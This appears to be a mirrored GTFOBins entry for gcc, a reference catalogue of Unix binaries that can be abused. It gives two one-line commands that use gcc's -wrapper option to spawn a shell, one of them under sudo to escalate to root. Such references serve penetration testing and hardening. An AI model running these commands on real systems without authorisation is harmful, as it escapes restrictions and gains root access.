mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-01-19 05:51:36 +01:00
8 lines
117 B
Markdown
8 lines
117 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: gcc -wrapper /bin/sh,-s .
|
|
sudo:
|
|
- code: sudo gcc -wrapper /bin/sh,-s .
|
|
---
|